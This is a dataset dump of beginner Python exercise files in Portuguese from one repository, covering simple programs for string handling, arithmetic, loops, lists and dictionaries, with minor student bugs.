"blob_id": "fd7af8e2688b844712e08ca825c6912424d25597",
"content_id": "b4da08eed06ba956bad46729a8730be98c613407",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 3,
"path": "/EX 024_Verificando_as_primeiras_letras_de_um_Texto.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "cidade = str(input(\"Digite o nome da cidade em que voce nasceu: \")).upper().strip()\nprint(f\"Voce nasceu em {cidade}\")\nprint(f\"Tem santo no nome da cidade em que voce nasceu ? {'SANTO' in cidade}\")"
},
{
"alpha_fraction": 0.5334873199462891,
"alphanum_fraction": 0.5496535897254944,
"avg_line_length": 24.52941131591797,
"blob_id": "2c75e8e1707a93736a71273127b5389cb0e062c2",
"content_id": "c651349e8f52029d21e3c5ff28676842a467a968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 435,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 17,
"path": "/EX 058 _Jogo_da _Adivinhação_v2.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\npc = randint(0, 10)\ncont = 0\n\nwhile True:\n usuario = int(input(\"Digite o numero que você pensou: \"))\n if usuario == pc:\n cont += 1\n break\n else:\n if pc > usuario:\n print(\"Maior...Tente novamente\")\n cont += 1\n elif pc < usuario:\n print(\"Menor...Tente novamente\")\n cont += 1\nprint(f\"Parabens voce acertou na {cont}º tentativa\")"
},
{
"alpha_fraction": 0.5707316994667053,
"alphanum_fraction": 0.5902438759803772,
"avg_line_length": 19.600000381469727,
"blob_id": "29fdcb7cd8030e5d58fd297c90ff1329b9a91f4f",
"content_id": "cc8aa0c1edc278d990d7fc605090ab984768c173",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/EX 061_Progressão_Aritmética_v2.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "primeiro = int(input(\"Digite o primeiro termos:\"))\nrazao = int(input(\"Razão: \"))\ntermo = primeiro\ncont = 1\n\nwhile cont <= 10:\n print(f\"{termo} ->\", end=\" \")\n termo += razao\n cont += 1\nprint(\"FIM\")"
},
{
"alpha_fraction": 0.6499999761581421,
"alphanum_fraction": 0.6611111164093018,
"avg_line_length": 44,
"blob_id": "b19855d166e3e577baceeba1cfdf4957f9e2043b",
"content_id": "880628b14ed372ccd4895436cecee675cd9eb886",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 180,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 4,
"path": "/EX 027_Primeiro_e_ultimo_nome_de_uma_pessoas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "nome = str(input(\"Digite seu nome completo: \")).strip().split()\nprint(\"E um prazer te conhecer....\")\nprint(f\"Seu primeiro nome e {nome[0]}\")\nprint(f'Seu ultimo nome e {nome[-1]}')\n"
},
{
"alpha_fraction": 0.650943398475647,
"alphanum_fraction": 0.6603773832321167,
"avg_line_length": 36.411766052246094,
"blob_id": "a567ddfcf1cd453fb51ab5f23e1497e639093217",
"content_id": "1aefdf4e0375a78d9228dc4c133e8318f8eda0e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 643,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 17,
"path": "/EX 092_Cadastro de Trabalhador em Python.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\ntrabalhador = dict()\n\n\ntrabalhador['Nome'] = str(input(\"Digite seu nome : \"))\nnasc = int(input(\"Digite o ano de nascimento :\"))\ntrabalhador['idade'] = datetime.now().year - nasc\ntrabalhador['CTPS'] = int(input('Digite o numero da CTPS (0 não tem) : '))\nif trabalhador['CTPS'] != 0:\n trabalhador['contratação'] = int(input(\"Ano de contração : \"))\n trabalhador['Salario'] = float(input(\"Salario R$\"))\n trabalhador['Aposentadoria'] = trabalhador['idade'] + ((trabalhador['contratação'] + 35) - datetime.now().year)\n\nprint('X' * 25)\n\nfor k, v in trabalhador.items():\n print(f'{k} tem o valor {v}')\n"
},
{
"alpha_fraction": 0.591549277305603,
"alphanum_fraction": 0.6056337952613831,
"avg_line_length": 27.600000381469727,
"blob_id": "eb6deac7e7dbfe91b4e733b6bd5e1b1c6ad61472",
"content_id": "4694943308e8d5b80063cfb1407e417e6f487994",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 5,
"path": "/EX 030_Par_ou_impar.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num = int(input(\"Digite um numero qualquer: \"))\nif num % 2 == 0:\n print(f\"O numero {num} e PAR\")\nelse:\n print(f\"O numero {num} e IMPAR\")"
},
{
"alpha_fraction": 0.6434977650642395,
"alphanum_fraction": 0.6928251385688782,
"avg_line_length": 48.66666793823242,
"blob_id": "5259e9f818f92921ed979576546f5069439a1761",
"content_id": "9918a2a665de9f32155a5f2640faf326985ea793",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 9,
"path": "/EX 034_Aumento_de_multiplos.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "salario = float(input(\"Digite o salario do funcionario R$ \"))\nif salario <= 1250:\n novosalario = salario + (salario * 15 / 100)\n print(f\"O salario do funcionario que era R$ {salario} depois do aumento de 15% ficara {novosalario}\")\nelif salario > 1250:\n novosalario = salario + (salario * 10 / 100)\n print(f\"O salario do funcionario que era R$ {salario} depois do aumento de 10% ficara {novosalario}\")\nelse:\n print(\"Valor invalido\")"
},
{
"alpha_fraction": 0.5761317014694214,
"alphanum_fraction": 0.6213991641998291,
"avg_line_length": 33.85714340209961,
"blob_id": "9104355d2f88d929abb9dbde476e9189adc88223",
"content_id": "eb9541df0acf7ec005093719319644e1499b4d29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 7,
"path": "/EX 064_Tratando_vários_valores _v1.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "soma = cont = 0\nnum = float(input(\"Digite um numero e [999] para PARAR: \"))\nwhile num != 999:\n soma += num\n cont += 1\n num = float(input(\"Digite um numero e [999] para PARAR: \"))\nprint(f\"Voce digitou {cont} numeros e a soma e {soma}\")"
},
{
"alpha_fraction": 0.6132478713989258,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 28.3125,
"blob_id": "92ed339282ad3c523b7c96ac40613dd4c585a88a",
"content_id": "439429d15231e5370ef608830699f656ceda95f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 16,
"path": "/EX 033_Maior_e_meno_ valores.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num1 = float(input(\"Primeiro numero: \"))\nnum2 = float(input(\"Segundo numero: \"))\nnum3 = float(input(\"Terceiro numero: \"))\n#verificando quem e menor\nmenor = num1\nif num2 < num1 and num2 < num3:\n menor = num2\nelif num3 < num1 and num3 < num2:\n menor = num3 \nprint(f\"O menor valor digitado foi {menor}\")\nmaior = num1\nif num2 > num1 and num2 > num3:\n maior = num2\nelif num3 > num1 and num3 > num2:\n maior = num3 \nprint(f\"O maior valor digitado foi {maior}\")"
},
{
"alpha_fraction": 0.5457627177238464,
"alphanum_fraction": 0.5966101884841919,
"avg_line_length": 33.764705657958984,
"blob_id": "e4af845e3d75b2aa13ead5b0c55428e7253f9862",
"content_id": "2d8b9bfcec698c120b2979681c5260f0facd517a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/EX 042_Analisando_Triângulos_v2.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "print(\"-=-\" * 20)\nprint(\"Analisado de triangulos:\")\nprint(\"-=-\" * 20)\nr1 = float(input(\"Primeiro seguimento: \"))\nr2 = float(input(\"Segundo seguimento: \"))\nr3 = float(input(\"Terceiro seguimento: \"))\n \nif r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:\n print(f\"Os segmentos {r1}, {r2}, {r3} PODEM FORMA TRIANGULO6\")\n if r1 == r2 == r3:\n print(f\"E o triangulo e EQUILATERO\")\n elif r1 != r2 != r3 != r1:\n print(f\"E o triangulo e ESCALENO\")\n else:\n print(f\"E o triangulo e ISOSCELES\")\nelse:\n print(f\"Os segmentos {r1}, {r2}, {r3} NAO PODEM FORMA TRIANGULO\")"
},
{
"alpha_fraction": 0.5136363506317139,
"alphanum_fraction": 0.5409091114997864,
"avg_line_length": 29.85714340209961,
"blob_id": "11875864ed992370f35f0f446508275e61118a16",
"content_id": "83c16f0b1c82850ea1ac3f4da7a23618441355ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 7,
"path": "/EX 050_Soma_dos_pares.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "soma = cont = 0\nfor c in range(0, 6):\n num = int(input(f\"Digite o {c} valor: \"))\n if num % 2 == 0:\n soma += num\n cont += 1\nprint(f\"Voce informou {cont} pares e a soma desses numeros foi {soma}\") \n\n\n\n"
},
{
"alpha_fraction": 0.6779661178588867,
"alphanum_fraction": 0.6779661178588867,
"avg_line_length": 58.5,
"blob_id": "ca4a18f3a765bf32caf46d2841ec5da4ee41926b",
"content_id": "3ef5a4c485428b0cb8952dd249a59d332bce1484",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 2,
"path": "/EX 026_Primeira_e_ultima_ocorrencia_de_uma_string.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "frase = str(input(\"Digite uma frase ?\")).upper().strip()\nprint(f'A letra A aparece {frase.count(\"A\")} vezes na frase')"
},
{
"alpha_fraction": 0.6882715821266174,
"alphanum_fraction": 0.7114197611808777,
"avg_line_length": 45.35714340209961,
"blob_id": "5a6f3eb6c40c277361f826f06dee6953e6e68d01",
"content_id": "d207e4473cceab1781436a7203d84032790350ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 653,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 14,
"path": "/EX 036_Aprovando_emprestimo.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "emprestimo = float(input(\"Digite o valor do emprestimo: \"))\nrenda = float(input(\"Digite o seu salario: \"))\nanos = float(input(\"Digite em quantos anos você vai pagar: \"))\nparcelas = anos * 12\nprestação = emprestimo / parcelas\nminimo = renda * 30 /100 \nprint(f\"Para pagar um empretimo de R${emprestimo:.2f} em {anos:.0f} anos \")\nprint(f\"Tem que pagar {parcelas:.0f} X {prestação:.2f}\")\nprint(f\"E a parcela minima e {parcelas:.0f} X {minimo:.2f}\")\nif renda <= minimo:\n print(\"PARABENS SEU EMPRESTIMO FOI AUTORIZADO\")\nelse:\n print(\"INFELIZMENTE NAO PODEMOS AUTORIZAR SEU EMPRESTIMO NESSE MOMENTO\")\n print(\"Salario abaixo dos 30% autorizado\")"
},
{
"alpha_fraction": 0.6742424368858337,
"alphanum_fraction": 0.6868686676025391,
"avg_line_length": 42.88888931274414,
"blob_id": "d789e0d756d771b840fdeac9aa333b0570e0d8c2",
"content_id": "dcacdb63aa80f096743a96b15d5ebadfebd4d3de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 398,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 9,
"path": "/EX 029_Radar_eletronico.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "vel = int(input(\"Qual a velocidade do carro ? \"))\nvelMaxima = 80\nif vel > 80:\n print(f\"Sua velocidade atual e {vel}Km/h e voce esta acima de velocidade maxima que e {velMaxima}Km/h\")\n print(\"MULTADO\")\n print(f\"Tera que pagar um multa de R$ {(vel - velMaxima) * 7}\")\nelse:\n print(\"Sua velocidade esta dentro dos padroes de segurança\")\nprint(\"Tenha um bom dia! Dirija com segurança\")\n\n"
},
{
"alpha_fraction": 0.4435215890407562,
"alphanum_fraction": 0.5033222436904907,
"avg_line_length": 17.84375,
"blob_id": "201961e304060685bf5b6b6c32ba4961ce5bab98",
"content_id": "5c280f2cde4cff626a8c59399d550ec734d60219",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 604,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 32,
"path": "/EX 106_Interactive helping system in Python.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "cores = ('\\33[m',\n '\\33[0;40;41m',\n '\\33[0;30;46m',\n '\\33[0;35;43m',\n '\\33[0;43;47m',);\n\n\n\ndef ajuda(com):\n titulo(f'Acessando manual de comandos \\'{com}\\'', 4)\n help(com)\n\n\ndef titulo(msg, cor=0):\n tam = len(msg) + 4\n print(cores[cor], end='')\n print('~' * tam)\n print(f' {msg}')\n print('~' * tam)\n print(cores[0], end='')\n\n\ncomando = \"\"\nwhile True:\n titulo('Sistema de ajuda PYHelp', 1)\n comando = str(input('Função ou Biblioteca > '))\n\n if comando.upper() == 'FIM':\n break\n else:\n ajuda(comando)\ntitulo('Ate Logo',1)"
},
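EX 106 above styles its output with raw ANSI escape sequences; a minimal sketch of the same idea with named constants (assumes an ANSI-capable terminal; not part of the repository):

    RESET = '\033[m'          # clear all attributes
    ALERT = '\033[0;30;41m'   # style 0, black foreground (30), red background (41)
    print(f'{ALERT} alerta {RESET} texto normal')
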
{
"alpha_fraction": 0.6775362491607666,
"alphanum_fraction": 0.6847826242446899,
"avg_line_length": 38.14285659790039,
"blob_id": "238f34645437a72ed0c049c4528eb30b9e4f2e34",
"content_id": "9590ff62925f92b444f627fb422b24cac9578231",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 7,
"path": "/EX 007_Media_aritimetica.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "notas = []\nquantidade = int(input(\"Quantas notas deseja adicionar:\"))\nfor c in range(0, quantidade):\n notas.append(float(input(f'Digite a nota {c+1}:')))\nsoma = sum(notas)\nprint(f'A soma total das notas e {soma}')\nprint(f'A nota media desse aluno e {soma / quantidade}')\n\n\n"
},
{
"alpha_fraction": 0.5235571265220642,
"alphanum_fraction": 0.5365135669708252,
"avg_line_length": 26.8360652923584,
"blob_id": "47a7dc4a500b16ca83213855d23f50c1064d5613",
"content_id": "7b1494bb013d6e6607594a7bb27517df3cf9c70a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1706,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 61,
"path": "/EX 009_Tabuada.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def soma():\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f\"{num} + {c} = {num + c}\")\n print(\"\\n\\n\")\n\n\ndef subtracao():\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f'{num} - {c} = {num - c}')\n print(\"\\n\\n\")\n\n\ndef multiplicacao():\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f'{num} X {c} = {num * c}')\n print(\"\\n\\n\")\n\n\ndef todos():\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f\"{num} + {c} = {num + c}\")\n print(\"\\n\")\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f'{num} - {c} = {num - c}')\n print(\"\\n\")\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f'{num} - {c} = {num - c}')\n\n\nwhile True:\n num = int(input('Digite aqui o numero que voce que ver a tabuada: '))\n posicaoInicial = int(input('Em que numero deseja iniciar a conta: '))\n posicaoFinal = int(input(\"Em que numero deseja terminar: \"))\n if posicaoFinal <= posicaoFinal:\n while posicaoFinal <= posicaoInicial:\n print(\"Numero final menor ou igual a numero inicial: \")\n posicaoFinal = int(input(\"Em que numero deseja terminar: \"))\n\n print('I-I' * 10)\n print('I-I' * 3, 'OPERADORES', 'I-I' * 3)\n print('I-I' * 10)\n print('( 1 ) SOMA\\n'\n '( 2 ) SUBTRAÇÃO\\n'\n '( 3 ) MULTIPLICAÇÃO\\n'''\n '( 4 ) TODOS\\n'\n '( 5 ) SAIR')\n\n opcao = int(input('Qual OPÇÃO vai usar ?'))\n\n if opcao == 1:\n soma()\n elif opcao == 2:\n subtracao()\n elif opcao == 3:\n multiplicacao()\n elif opcao == 4:\n todos()\n elif opcao == 5:\n break\n else:\n print(\"Opção invalida\")\n"
},
{
"alpha_fraction": 0.6769230961799622,
"alphanum_fraction": 0.6807692050933838,
"avg_line_length": 28,
"blob_id": "1688e15eb29117efd9e0931987d86e50ca5c26b8",
"content_id": "d61058f52393c805fd48c7811af7f4ff723422a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 9,
"path": "/EX 053_Detector_de_Palíndromo_sem _for.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "frase = str(input(\"Digite uma frase: \")).upper().strip()\npalavras = frase.split()\njunto= \"\".join(palavras)\ninverso = junto[::-1]\nprint(junto, inverso)\nif inverso == junto:\n print(\"Temos um palindromo\")\nelse:\n print(\"A frase digitada nao e um palindromo\")"
},
{
"alpha_fraction": 0.7164179086685181,
"alphanum_fraction": 0.7164179086685181,
"avg_line_length": 44,
"blob_id": "6e89ec7fc7e5dd1a187bd540d575b51bbc39299a",
"content_id": "256fb30f9c47539a8b681259051ce91ae6ffeecd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 3,
"path": "/EX 016_Quebrando_Numero.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from math import trunc\nnum = float(input('Digite um valor: '))\nprint(f'O valor digitado foi {num} e sua parte inteira e {trunc(num)}')"
},
{
"alpha_fraction": 0.7630331516265869,
"alphanum_fraction": 0.7630331516265869,
"avg_line_length": 45.88888931274414,
"blob_id": "597f39607e94b4c0ce24d56a20f9f379d5b53665",
"content_id": "395ba2e392ca90ad446e0d39f1752c505d45f21d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 9,
"path": "/EX 018_Seno_Casseno_Tangente.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "#import math\nfrom math import sin, cos, tan, radians\nanguloqualquer = float(input('digite um angulo: '))\nseno = sin(radians(anguloqualquer))\nprint(f'o angulo qualquer {anguloqualquer} tem o seno {seno} ')\ncosseno = cos(radians(anguloqualquer))\nprint(f'o angulo qualquer {anguloqualquer} tem o cosseno {cosseno}')\ntangente = tan(radians(anguloqualquer))\nprint(f'o anglo quaquer {anguloqualquer} tem a tangente {tangente}')\n"
},
{
"alpha_fraction": 0.6330274939537048,
"alphanum_fraction": 0.6513761281967163,
"avg_line_length": 35.66666793823242,
"blob_id": "516e154e480033d5908143213c38e50334bc695f",
"content_id": "af3461f2fdf1a423d74e1dc2684a4da4230a8fa7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 109,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 3,
"path": "/EX 005_Antescessor_e_sucessor.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num = int(input('Digite um numero:'))\nprint(f'Seu sucessor e {num + 1}')\nprint(f'Seu antecessor e {num - 1}')"
},
{
"alpha_fraction": 0.5562015771865845,
"alphanum_fraction": 0.5775193572044373,
"avg_line_length": 20.375,
"blob_id": "7441d3ae77b90a67b8bf1f1bd97b70f41eca86fc",
"content_id": "b47b07ab0105db7ee6f28c71053fa6ad623ffc3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 24,
"path": "/EX 100_Funções para sortear e somar.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nfrom time import sleep\n\ndef sorteia(lista):\n print(f'Sorteando 5 valores da lista: ', end='')\n for cont in range(0,5):\n n = randint(1,10)\n lista.append(n)\n print(f'{n}', end =' ', flush= True)\n sleep(0.6)\n print('Pronto')\n\ndef somaPar(lista):\n soma = 0\n for valor in lista:\n if valor % 2 == 0:\n soma += valor\n print(f'Somando os valores pares de {lista}, temos {soma}')\n\n\nnumero = list()\n\nsorteia(numero)\nsomaPar(numero)\n\n\n\n"
},
{
"alpha_fraction": 0.49674901366233826,
"alphanum_fraction": 0.5292587876319885,
"avg_line_length": 31.04166603088379,
"blob_id": "7201cf00facfba7207d1f3150cad66b881220a84",
"content_id": "8c3da9f83414d55506cffcb128956f3bdea464ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 24,
"path": "/EX 069_Análise_de_dados_do_grupo.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "contM = contF20 = tot18 = contF=0\nwhile True:\n idade = (int(input(\"Idade: \")))\n sexo = \" \"\n while sexo not in \"MF\":\n sexo = str(input(\"Sexo: \")).strip().upper()[0]\n if idade >= 18:\n tot18 = 1\n if sexo == \"M\":\n contM += 1\n if sexo == \"F\" and idade < 20:\n contF20+= 1\n if sexo == 'F':\n contF += 1\n opc = \" \"\n while opc not in 'SN':\n opc = str(input(\"Quer continuar? [S/N]\")).strip().upper()[0]\n if opc == \"N\":\n break\nprint(\"Acabou\")\nprint(f'Total de pessoas com mais de 18 anos {tot}')\nprint(f\"Temos um total de {contM} homens\")\nprint(f\"Temos um total de {contF20} de mulheres com menos de 20 anos \")\nprint(f'Temos um total de {contF} de mulheres cadstradas')\n"
},
{
"alpha_fraction": 0.6965944170951843,
"alphanum_fraction": 0.6965944170951843,
"avg_line_length": 39.5,
"blob_id": "132c82863111bcf493be5ac4301a58213eb3fc3a",
"content_id": "ee789458c4dfcf7f9e3ef03faf88d46d60c56e1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 8,
"path": "/EX 004_Dissecando_uma_Variavel.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "algo = input(\"Digite algo ?\")\nprint(f'O seu tipo e {type(algo)}')\nprint(f'E numerico? {algo.isalnum()}')\nprint(f'E alphanumerico {algo.isalpha()}')\nprint(f'Esta em maiusculas {algo.isupper()}')\nprint(f'Esta em minuscula {algo.islower()}')\nprint(f'Esta caqpitalizado {algo.istitle()}')\nprint(f'Tem espaços {algo.isspace()}')"
},
{
"alpha_fraction": 0.6709265112876892,
"alphanum_fraction": 0.6837060451507568,
"avg_line_length": 26.217391967773438,
"blob_id": "18be34dc2c9de6615f7e13c76a564dbf1e1288a6",
"content_id": "042719acc096d183abb06bcbca827f195ef8a78d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 638,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 23,
"path": "/EX 041_Classificando_Atletas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import date\n\nanoAtual = date.today().year\n\nidade = int(input(\"Digite o ano do ser nacscimento: \"))\n\nidadeAtual = anoAtual - idade\n\nif idadeAtual <= 9:\n print(f\"Voce tem {idadeAtual} anos\")\n print(\"Classificação: MIRIM\")\nelif idadeAtual <= 14:\n print(f\"Voce tem {idadeAtual} anos\")\n print(\"Classificação: INFANTIL\")\nelif idadeAtual <= 19:\n print(f\"Voce tem {idadeAtual} anos\")\n print(\"Classificação: JÚNIOR\")\nelif idadeAtual <= 25:\n print(f\"Voce tem {idadeAtual} anos\")\n print(\"Classificação: SÊNIOR\")\nelse:\n print(f\"Voce tem {idadeAtual:.2f} anos\")\n print(\"Classificação: MASTER\")\n"
},
{
"alpha_fraction": 0.5574572086334229,
"alphanum_fraction": 0.5892420411109924,
"avg_line_length": 26.33333396911621,
"blob_id": "ff9cf349f6cb79d77ceea13459c838c53e96462b",
"content_id": "947b41552f118fa0f73c7a14a9d6cf4704853d51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 409,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 15,
"path": "/EX 085_Listas com pares e ímpares.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num = [[], []]\nvalor = 0\nqtd = int(input(\"Quantas numeros deseja cadastrar ? \"))\nfor c in range(0, qtd):\n valor = (int(input(f'Digite o {c + 1}: ')))\n if valor % 2 == 0:\n num[0].append(valor)\n else:\n num[1].append(valor)\nprint(\"X\" * 30)\nprint(f'{num}')\nnum[0].sort()\nnum[1].sort()\nprint(f'Os valores pares digitados foram {num[0]}')\nprint(f'Os valores impares digitados foram {num[1]}')"
},
{
"alpha_fraction": 0.545271635055542,
"alphanum_fraction": 0.5513078570365906,
"avg_line_length": 21.590909957885742,
"blob_id": "b3a2f02891dd6e566298abb9e029f0b7e8a53aae",
"content_id": "d4f28db3e1c7e9b1b446a1612a1f3a7ae5c68876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 499,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 22,
"path": "/EX 082_Dividindo_valores_em_várias_listas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "lista = []\npares = []\nimpar = []\n\nwhile True:\n num = int(input('Digite um valor: '))\n lista.append(num)\n opc = str(input('Quer continuar [S/N]? ')).strip().upper()[0]\n if opc == 'S':\n continue\n elif opc == 'N':\n break\n else:\n print('Opção invalida')\nfor i, v in enumerate(lista):\n if v % 2 == 0:\n pares.append(v)\n else:\n impar.append(v)\nprint(f'Lista completa {lista}')\nprint(f'Lista de pares {pares}')\nprint(f'Lista de impares {impar}')\n"
},
{
"alpha_fraction": 0.7162162065505981,
"alphanum_fraction": 0.7207207083702087,
"avg_line_length": 26.875,
"blob_id": "5953f78d8d1457adf29980508a237764cd4e3860",
"content_id": "7e99f806ba6c4fddcdeb4906d549d99b084c1a48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 222,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 8,
"path": "/EX 017_Cateto_Hipotenusa.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "import math\n\ncateto_op = float(input(\"Qual comprimento cateto oposto ? \"))\ncateto_ad = float(input(\"Qual comprimento cateto adijacente ? \"))\n\nhi = math.hypot(cateto_op, cateto_ad)\n\nprint(f'A hipotenuza vai medir {hi:.2f}')"
},
{
"alpha_fraction": 0.5249999761581421,
"alphanum_fraction": 0.574999988079071,
"avg_line_length": 24.125,
"blob_id": "762f41fce463026c494b7d440f30eb6a1f77b3a4",
"content_id": "487dec313243ba0d35e7bdb0e67b785f9f54f34f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 8,
"path": "/EX 048_Soma_ímpares_múltiplos_de_três.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "soma = 0\ncont = 0\nfor c in range (0,501, 2):\n if c % 3 == 0:\n cont += 1\n soma += c \nprint(f\"A soma de todos os valores e {soma} \")\nprint(f\"A quantidade de numeros somados foram {cont}\")"
},
{
"alpha_fraction": 0.500544548034668,
"alphanum_fraction": 0.5604481101036072,
"avg_line_length": 38.18902587890625,
"blob_id": "36f0abdb41b1fd389cea54cb5b89ea5c4292c221",
"content_id": "8e236065bd375ab49d8e90be3b824278958b2cf2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6432,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 164,
"path": "/EX 010_Coversor_de_moedas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
